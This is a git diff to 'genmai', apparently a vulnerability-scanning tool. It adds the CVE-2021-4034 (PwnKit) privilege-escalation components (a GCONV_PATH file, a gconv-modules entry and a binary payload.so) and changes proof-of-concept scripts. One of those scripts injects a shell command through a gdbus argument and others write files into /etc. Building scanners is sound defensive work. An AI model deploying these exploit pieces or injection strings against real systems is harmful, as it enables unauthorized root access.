diff --git a/data/SystemPocs/CVE-2021-4034/CVE-2021-4034.yaml b/data/SystemPocs/CVE-2021-4034/CVE-2021-4034.yaml index e736f04..ef157f5 100644 --- a/data/SystemPocs/CVE-2021-4034/CVE-2021-4034.yaml +++ b/data/SystemPocs/CVE-2021-4034/CVE-2021-4034.yaml @@ -1,5 +1,5 @@ FormatVer: 20230306 -Id: CVE-2021-4043 +Id: CVE-2021-4034 Belong: system PocHazardLevel: low Source: https://github.com/berdav/CVE-2021-4034 diff --git a/data/SystemPocs/CVE-2021-4034/GCONV_PATH=./exploit b/data/SystemPocs/CVE-2021-4034/GCONV_PATH=./exploit new file mode 100755 index 0000000..e69de29 diff --git a/data/SystemPocs/CVE-2021-4034/exploit/gconv-modules b/data/SystemPocs/CVE-2021-4034/exploit/gconv-modules new file mode 100644 index 0000000..ace8b1b --- /dev/null +++ b/data/SystemPocs/CVE-2021-4034/exploit/gconv-modules @@ -0,0 +1 @@ +module UTF-8// INTERNAL ../payload 2 diff --git a/data/SystemPocs/CVE-2021-4034/payload.so b/data/SystemPocs/CVE-2021-4034/payload.so new file mode 100755 index 0000000..8080e40 Binary files /dev/null and b/data/SystemPocs/CVE-2021-4034/payload.so differ diff --git a/data/SystemPocs/CVE-2022-0351/CVE-2022-0351.yaml b/data/SystemPocs/CVE-2022-0351/CVE-2022-0351.yaml index 8dc1ede..3e74c38 100644 --- a/data/SystemPocs/CVE-2022-0351/CVE-2022-0351.yaml +++ b/data/SystemPocs/CVE-2022-0351/CVE-2022-0351.yaml @@ -33,18 +33,6 @@ SiteRequests: Exec : ./CVE-2022-0351 Args : ExpireTime: #second - - # < input - # > output - # . wait - # ? condition - # : content - # - #组合起来 - # >. 等待直到输出 - # << 输入字符 - # >?判断条件 - # ??判断程序错误码 eg. "??:0" Inter: - "??:0" Condition: None diff --git a/data/SystemPocs/KVE-2022-0205/KVE-2022-0205.py b/data/SystemPocs/KVE-2022-0205/KVE-2022-0205.py index 3bda459..2a6931e 100644 --- a/data/SystemPocs/KVE-2022-0205/KVE-2022-0205.py +++ b/data/SystemPocs/KVE-2022-0205/KVE-2022-0205.py @@ -36,5 +36,9 @@ def copy_file(target_dir, src_file): os.system('touch restore_all_sound_file.txt') copy_file("/etc", os.path.realpath("./restore_all_sound_file.txt")) -os.system('ls -l /etc/restore_all_sound_file.txt') +result=os.popen('ls -l /etc/restore_all_sound_file.txt') +if result.read=="restore_all_sound_file.txt": + print("succ") +else : + print("fail",result.read()) os.system('rm restore_all_sound_file.txt') \ No newline at end of file diff --git a/data/SystemPocs/KVE-2022-0206/KVE-2022-0206.sh b/data/SystemPocs/KVE-2022-0206/KVE-2022-0206.sh index 42c9080..75a3281 100644 --- a/data/SystemPocs/KVE-2022-0206/KVE-2022-0206.sh +++ b/data/SystemPocs/KVE-2022-0206/KVE-2022-0206.sh @@ -4,4 +4,6 @@ if ls /tmp/toggleCameraDevicTest.txt then gdbus call --system --dest org.ukui.kds --object-path / --method org.ukui.kds.interface.toggleCameraDevice "1';rm /tmp/toggleCameraDevicTest.txt;'" echo 'successfully' +else +echo 'fail' fi \ No newline at end of file diff --git a/data/SystemPocs/KVE-2022-0210/KVE-2022-0210.py b/data/SystemPocs/KVE-2022-0210/KVE-2022-0210.py index 3477de4..6a94747 100644 --- a/data/SystemPocs/KVE-2022-0210/KVE-2022-0210.py +++ b/data/SystemPocs/KVE-2022-0210/KVE-2022-0210.py @@ -12,4 +12,6 @@ set_main_source("/etc", os.path.realpath('./set_main_source.txt')) result=os.popen('ls /etc/set_main_source.txt') if result.read() : print("successfully") +else: + print("fail") os.system('rm set_main_source.txt') \ No newline at end of file diff --git a/data/Yaml Formwork/formwork.yaml b/data/Yaml Formwork/formwork.yaml new file mode 100644 index 0000000..8beb9f7 --- /dev/null +++ b/data/Yaml Formwork/formwork.yaml @@ -0,0 +1,34 @@ +FormatVer: +Id: +Belong: +PocHazardLevel: +Source: +SiteInfo: + Name: + Severity: + Description: + + ScopeOfInfluence: + + References: + - + SiteClassification: + CvssMetrics: + CvssScore: + CveId: + CweId: + CnvdId: + KveId: + Tags: + - +SiteRequests: + Implement: + ImArray: + - Inter : + InterArgs : + Exec : + Args : + ExpireTime: + Inter: + - + Condition: diff --git a/docs/genmai使用文档.wps b/docs/genmai使用文档.wps index b2c284c..ad32db4 100644 Binary files a/docs/genmai使用文档.wps and b/docs/genmai使用文档.wps differ diff --git a/src/genmai/ArgParser/ParameterParser.go b/src/genmai/ArgParser/ParameterParser.go index 0fb3cd6..309c6cc 100644 --- a/src/genmai/ArgParser/ParameterParser.go +++ b/src/genmai/ArgParser/ParameterParser.go @@ -114,7 +114,8 @@ func ParameterParser(sSystem string,sKernel string,sWeb string,sBaseLine string, if Update=="true"{ if sSystem=="false"&&sKernel=="false"&&sWeb=="false"&&sBaseLine=="false" { - fmt.Println("Updating") + fmt.Println("Updating...") + genmai.Update() return }else{ fmt.Println("The update process does not allow other processes") diff --git a/src/genmai/Update.go b/src/genmai/Update.go new file mode 100644 index 0000000..43aefc4 --- /dev/null +++ b/src/genmai/Update.go @@ -0,0 +1,38 @@ +package genmai +import( + "fmt" + "bytes" + "os/exec" + "os" + "strings" +) +func Update(){ + currentDir, err:= os.Getwd() + if err != nil { + panic(err) + } else { + } + currentDir=currentDir+"/../" + os.Chdir(currentDir) + + currentDir, err = os.Getwd() + if err != nil { + panic(err) + } else { + cmd := exec.Command("git","pull") + var stdout, stderr bytes.Buffer + cmd.Stdout = &stdout // 标准输出 + cmd.Stderr = &stderr // 标准错误 + err := cmd.Run() + outStr, errStr := string(stdout.Bytes()), string(stderr.Bytes()) + if len(errStr)!=0{ + fmt.Printf(errStr) + } + outStr=strings.TrimSpace(outStr) + if err != nil { + fmt.Println("Updte Err:", err) + } + fmt.Println(outStr) + } + +} \ No newline at end of file